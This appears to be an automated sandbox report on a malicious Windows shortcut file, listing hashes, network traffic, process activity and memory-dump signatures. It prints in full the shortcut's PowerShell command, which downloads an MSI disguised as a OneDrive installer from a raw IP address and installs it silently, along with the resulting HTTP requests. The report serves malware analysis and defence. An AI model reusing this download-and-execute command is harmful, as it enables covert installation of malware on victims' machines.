                          Entropy (8bit):3.6176912404836905
                          TrID:
                          • Windows Shortcut (20020/1) 100.00%
                          File name:GIjkGXNvza.lnk
                          File size:2'439 bytes
                          MD5:a91248afd36d314539e4268e66cdad96
                          SHA1:c0b620a1253b556af91dee3d88579534e698b235
                          SHA256:14d22921b1d69f92edd0bd8e2c8670bb65255cb9ca7cba185ad67ff03d27067b
                          SHA512:33cb380c58c7d05c3e468d18649768f6aa6e6a225bbb63a31ab34cbe33c496823d64ca6b103075ccb64b1d4b0ed17a9b7a3d7cc684a55eedbd420dcee4a7dd4c
                          SSDEEP:24:84RoVpAaQLLUHMfcmpWzGVR8fT4t+A4I0cYL4o0CWXtepzP3e/lDxnvORhtC/A:8gA7skBcRlCI5owCCZmr
                          TLSH:D14111142BF94625D5B78A3ABC7AE3128572BC00FF129B9FC2C4850DAC21100E978F7E
                          File Content Preview:L..................F.... ........j.......j.......j...............................P.O. .:i.....+00.../C:\...................R.1......B..0.Windows.<........@.,.B..*.........................W.i.n.d.o.w.s.....V.1......B].0.System32..>........@.,.B].*.........
                          Icon Hash:71ac86c28ccded3d

                          General

                          Relative Path:
                          Command Line Argument:Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "%appdata%\Install.msi";msiexec.exe /i '%appdata%\Install.msi' /qn
                          Icon location:%SystemRoot%\System32\SHELL32.dll
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2025-02-04T14:19:25.684814+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.5497045.45.94.18680TCP
                          2025-02-04T14:19:27.320071+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.5497055.45.94.18680TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Feb 4, 2025 14:19:24.039774895 CET4970480192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:24.044714928 CET80497045.45.94.186192.168.2.5
                          Feb 4, 2025 14:19:24.045005083 CET4970480192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:24.048228025 CET4970480192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:24.053039074 CET80497045.45.94.186192.168.2.5
                          Feb 4, 2025 14:19:25.684705019 CET80497045.45.94.186192.168.2.5
                          Feb 4, 2025 14:19:25.684813976 CET4970480192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:25.692861080 CET4970480192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:25.695369959 CET4970580192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:25.697694063 CET80497045.45.94.186192.168.2.5
                          Feb 4, 2025 14:19:25.700191975 CET80497055.45.94.186192.168.2.5
                          Feb 4, 2025 14:19:25.700278044 CET4970580192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:25.700387955 CET4970580192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:25.705142975 CET80497055.45.94.186192.168.2.5
                          Feb 4, 2025 14:19:27.319917917 CET80497055.45.94.186192.168.2.5
                          Feb 4, 2025 14:19:27.320070982 CET4970580192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:27.320425034 CET4970580192.168.2.55.45.94.186
                          Feb 4, 2025 14:19:27.325181007 CET80497055.45.94.186192.168.2.5
                          • 5.45.94.186
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.5497045.45.94.186807264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          Feb 4, 2025 14:19:24.048228025 CET182OUTGET /download/OneDriveSetup.msi HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                          Host: 5.45.94.186
                          Connection: Keep-Alive


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.5497055.45.94.186807264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          Feb 4, 2025 14:19:25.700387955 CET182OUTGET /download/OneDriveSetup.msi HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                          Host: 5.45.94.186
                          Connection: Keep-Alive


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:08:19:20
                          Start date:04/02/2025
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:1
                          Start time:08:19:20
                          Start date:04/02/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:08:19:26
                          Start date:04/02/2025
                          Path:C:\Windows\System32\msiexec.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Roaming\Install.msi /qn
                          Imagebase:0x7ff6fac30000
                          File size:69'632 bytes
                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:08:19:26
                          Start date:04/02/2025
                          Path:C:\Windows\System32\msiexec.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\msiexec.exe /V
                          Imagebase:0x7ff6fac30000
                          File size:69'632 bytes
                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Reset < >
                            Memory Dump Source
                            • Source File: 00000000.00000002.2139018690.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848fe0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed3a5d26dd1474428f1c54038e7cc7670e24465f898ef8000cbde04ca643ced7
                            • Instruction ID: 6e8e8ac33f15b0f238f9cadeded4f69abb1e7f9b4a8869312b5c94fe42aa8fba
                            • Opcode Fuzzy Hash: ed3a5d26dd1474428f1c54038e7cc7670e24465f898ef8000cbde04ca643ced7
                            • Instruction Fuzzy Hash: DDD13731D0EACA5FEB69AB6858555B57BE0FF163A4F0800FAE04DC71D3EA2CA805C355
                            Memory Dump Source
                            • Source File: 00000000.00000002.2138569601.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f10000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                            • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                            • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                            Memory Dump Source
                            • Source File: 00000000.00000002.2138569601.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f10000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9feaf5cef4ee589c12bb38b0a712121f3170ab56019618cf25f4391725c91fec
                            • Instruction ID: 65756224da5a655332d86ce9b9a71d1aafa4c39a4b16bdd1d5e36445e3f4d9c3
                            • Opcode Fuzzy Hash: 9feaf5cef4ee589c12bb38b0a712121f3170ab56019618cf25f4391725c91fec
                            • Instruction Fuzzy Hash: CD21B031A0DE8A4FEBD5EB2C845866577E1FFB9350B4501BBD04CC7296DE28DC468710